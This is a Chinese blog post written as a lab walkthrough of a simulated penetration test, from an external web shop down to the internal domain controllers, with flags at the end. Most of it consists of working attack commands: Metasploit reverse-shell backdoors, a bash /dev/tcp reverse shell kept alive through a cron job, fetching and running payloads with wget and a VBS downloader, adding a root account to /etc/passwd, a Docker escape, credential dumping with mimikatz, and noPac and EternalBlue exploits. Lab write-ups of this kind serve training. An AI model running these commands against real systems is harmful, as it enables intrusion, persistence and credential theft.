模拟实战从外网打点渗透到内网域控的笔记

夜yesec

已于 2022-12-11 19:23:30 修改

阅读量1.3k

点赞数 1

分类专栏：靶机实战笔记安全文章标签：安全网络安全系统安全

于 2022-12-11 19:23:14 首次发布

本文链接：https://blog.csdn.net/qq_56426046/article/details/128277555

版权

安全同时被 2 个专栏收录

98 篇文章 13 订阅

订阅专栏

靶机实战笔记

28 篇文章 8 订阅

订阅专栏

信息收集

本次项目是一个是模拟渗透测试电信诈骗网站，境外人员依赖该网站通过优惠卷诱导受害者进行消费，
诈骗受害人金钱。
前台地址
项目拓扑图
在这里插入图片描述

http://ip/user.php?mod=do&act=login&fromto=http%3A%2F%2F43.143.193.216%2F

后台地址

http://ip/admin/webadmin.php?mod=do&act=login

robots.txt

前台注册信息

18945612354

yesir

123456

个人中心：

http://ip/user.php

逍遥商城

在这里插入图片描述

根据响应返回值的不同，尝试爆破弱口令。

在这里插入图片描述

爆破成功，密码nasa123

在这里插入图片描述

代码审计

经过移动端的代码审计，发现存在注入

在这里插入图片描述

然后构造payload

在这里插入图片描述

跑一下sqlmap，爆出库表

在这里插入图片描述

得出管理员密码

nasa123

然后登录后台寻找漏洞

访问重装目录发现如下提示

在这里插入图片描述

要是重装需要删除install.lock文件

在后台备份处找到可以删除文件的功能点

在这里插入图片描述

尝试是否有任意文件删除漏洞

查看源代码

在这里插入图片描述

发现并没有对删除的目录进行过滤

利用任意文件删除漏洞删除install.lock文件

在这里插入图片描述

任意文件写入配合重装系统获取webshell

然后发现可以重装系统，这也是个重装系统漏洞。

在这里插入图片描述

然后通过任意文件写入getshell，因为重装信息会写到config.php,也就给了我写马的机会.

拼接一句话

在这里插入图片描述

重装访问config.php成功拿到webshell。

在这里插入图片描述

提权

查找可以进行suid提权的命令

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

touch test
find test -exec whoami \;

在这里插入图片描述

判断在ls -alh /.dockerenv 容器内

ls -alh /.dockerenv

在这里插入图片描述

反向代理msf linux上线

在vps上设置 frps.ini

[common]
bind_port = 7000
token=yesir.aaaa

2.在内网的kali上配置frpc.ini

server_addr = vps-ip
server_port = 7000
token=yesir.aaaa
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 6666
remote_port = 6666
[msf2]
type = tcp
local_ip = 127.0.0.1
local_port = 7777
remote_port = 7777

配置好运行客户端和服务端

3.msf生成linux elf后门文件

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.59.138 lport=6666 -f
elf -o yesir.elf

4.msf设置监听

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf6 exploit(multi/handler) > set lport 6666
lport => 6666
msf6 exploit(multi/handler) > exploit

5.webshell执行后门

chmod +x yesir.elf
find test -exec ./yesir.elf \;

在这里插入图片描述

提取成功，root权限

在这里插入图片描述

创建linux root用户

openssl passwd -1 -salt yesir 123456
echo 'yesir:$1$yesir$Apee9NXsjpedOFK06C6tu0:0:0:root:/root:/bin/bash' >>
/etc/passwd

在这里插入图片描述

创建交互shell

python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
bash-4.3$
bash-4.3$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash-4.3$ su moonsec
su moonsec
Password: 123456

在这里插入图片描述

docker提权

现在还是处于容器内，所以还要进行提权到宿主上。在docker如果启动的时候 --privileged=true 是可以逃逸的。挂载宿主硬盘到test目录

创建目录
mkdir /test
将宿主的目录挂载到test目录
mount /dev/sda1 /test
改变根目录为 /test
chroot /test

在这里插入图片描述

宿主的目录

在这里插入图片描述

创建反弹shell

echo '/bin/bash -i >& bash -i >&/dev/tcp/192.168.59.128/23333 0>&1' >
/root/sec.sh
chmod +x /root/sec.sh
cat /tmp/sec.sh
写到计划任务里
echo '*/1 * * * * root bash /root/sec.sh' >>/etc/crontab

得到第一个flag

在这里插入图片描述

成功写到计划任务里

在这里插入图片描述

nc监听，等待反弹shell

vps     nc -lnvp 23333

通过任务获取宿主的反弹shell

在这里插入图片描述

宿主ubuntu msf后门上线

下载后门添加运行权限执行即可

wget http://192.168.59.128/yesir.elf

msf上线成功

在这里插入图片描述

内网横向渗透

msf设置代理扫描内网

添加路由

run get_local_subnets
run autoroute -s 192.168.59.0/255.255.255.0
run autoroute -p

在这里插入图片描述

启用代理，使用sock5

msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > show options
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/socks_proxy) >

设置 kali 的 /etc/proxychains4.conf 文件

sudo vim /etc/proxychains4.conf

添加 socks5 127.0.0.1 1080

在这里插入图片描述

利用代理，nmap扫描内网445端口

proxychains4 nmap -sT -Pn 192.168.59.0/24 -p 445 --open

nmap扫描结果

在这里插入图片描述

使用fscan扫描内网存活主机与端口

proxychains4 ./fscan_amd64 -h 192.168.59.0/24 -np -no -nopoc

fscan扫描结果

在这里插入图片描述

永恒之蓝

尝试对开放445端口的主机使用永恒之蓝攻击

use windows/smb/ms17_010_eternalblue
set pyaload windows/meterpreter/bind_tcp #选择正向shell
set rhosts 192.168.59.197
run

利用失败

在这里插入图片描述

根据扫描结果，发现有server2003的主机，尝试利用iis6.0 溢出获取权限

proxychains4 python2 ii6.py 192.168.59.144 80 192.168.59.128 4455

在这里插入图片描述

获得shell

在这里插入图片描述

S09-020-KB970483-CVE-2009-1535-IIS6 2003提权

vbs下载后门

echo set a=createobject(^"adod^"+^"b.stream^"):set
w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.se
nd:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>
downfile.vbs

cscript downfile.vbs http://192.168.59.128/IIS6.0.exe iis6.exe

获取系统权限

在这里插入图片描述

msf生成win后门上线

生成msf后门

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.59.128 lport=7777 -f exe -o s.exe

靶机下载msf后门

cscript downfile.vbs http://192.168.59.128/s.exe 2.exe

在这里插入图片描述

2003主机信息收集

内网10段扫描

C:\nasa>nbtscan -r 10.10.10.0/24

在这里插入图片描述

使用msf中的kiwi模块获取凭证

meterpreter > hashdump
Administrator:500:6c634e36565f85fc9c5014ae4718a7ee:f099c4a637f9b871487bbb03962f7
9b5::: 明文 admin555
ASPNET:1006:c5f4c32e080b1c0a19f45641a62db986:5643281884dd972acd9b0eaeecd13522:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_WWW79FA760B73D:1000:a1323e561696c32ad68862a8c0118e7e:00dd987a1d0c4540f919b3eb5fc0b1
cd:::
IWAM_WWW79FA760B73D:1001:123dec921ecc0ca82f1106015d8abba7:556f2d1b30d88fc35eb8c4d573a5cd
14:::
SUPPORT_388945a0:1004:aad3b435b51404eeaad3b435b51404ee:f739006531fcc09af8615f957
5fa943c:::

smb 用户批量爆破

把netbios name设置用户列表使用smb 登录模块进行批量弱口令测试

用户列表

administrator WIN2003 AD01 AD02 WIN7

使用smb模块

use scanner/smb/smb_login

在这里插入图片描述

psexec登录获取shell

use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set RHOSTS 192.168.59.197
RHOSTS => 192.168.59.197
msf6 exploit(windows/smb/psexec) > set smbpass admin555
smbpass => admin555
msf6 exploit(windows/smb/psexec) > set smbuser WIN7
set payload windows/meterpreter/bind_tcp

impacket smbsxec 登录失败

└─$ proxychains4 python3 smbexec.py WIN7:admin555@10.10.10.142
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.10.142:445  ...  OK
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

ms17_010_psexec 登录

use windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set smbuser win7
set smbpass admin555
run

在这里插入图片描述

win7主机信息收集

成功获取一个域普通用户

迁移下进程然后获取win7

hashdump

在这里插入图片描述

kiwi_cmd sekurlsa::logonPasswords

在这里插入图片描述

CVE-2021-42278 and CVE-2021-42287 攻击域控

工具地址：https://github.com/Ridter/noPac

在攻击域控之前修改/etc/resolve.conf,修改DNS为10.10.10.140

proxychains4 python noPac.py nasa.gov/test:'QWEasd!@#999' -dc-ip 10.10.10.140 -
dc-host AD01 -shell --impersonate administrator
proxychains4 noPac.py nasa.gov/test:'QWEasd!@#999' -dc-ip 10.10.10.140 -dc-host
AD01 --impersonate administrator -dump

在这里插入图片描述

域控的hash

Administrator:500:aad3b435b51404eeaad3b435b51404ee:fbe5588a79e40d41d77a40569c7b3
090:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c0
89c0:::

根据域控hash获取域控的权限

在这里插入图片描述

备份域的权限

在这里插入图片描述

主机名	flag
ad01	ad01 moonsec_flag{2181d94fba9a1d2de2b5f6fb75f8ab08}
ad02	moonsec_flag{d3eb9a9233e52948740d7eb8c3062d14}
win2003	moon_flag{7555051b6d8a2dca27a29f9cb0d2e3a6}
ubuntu	moonsec_flag{182be0c5cdcd5072bb1864cdee4d3d6e}
win7	moon_flag{0b08bd98d279b88859b628cd8c061ae0}

这次模拟实战的项目几乎是第一次做这么完整的项目从外网渗透到内网域控，这次渗透过程中学到了很多东西，但很多也是我应该熟练使用的。继续加油。

在这里插入图片描述

来人间一趟你要看看太阳

夜yesec

关注

1
点赞
踩
6

收藏

觉得还不错? 一键收藏
打赏
0
评论
模拟实战从外网打点渗透到内网域控的笔记

在docker如果启动的时候 --privileged=true 是可以逃逸的。这次模拟实战的项目几乎是第一次做这么完整的项目从外网渗透到内网域控，这次渗透过程中学到了很多东西，但很多也是我应该熟练使用的。然后通过任意文件写入getshell，因为重装信息会写到config.php,也就给了我写马的机会.工具地址：https://github.com/Ridter/noPac。设置 kali 的 /etc/proxychains4.conf 文件。利用任意文件删除漏洞删除install.lock文件。
复制链接

扫一扫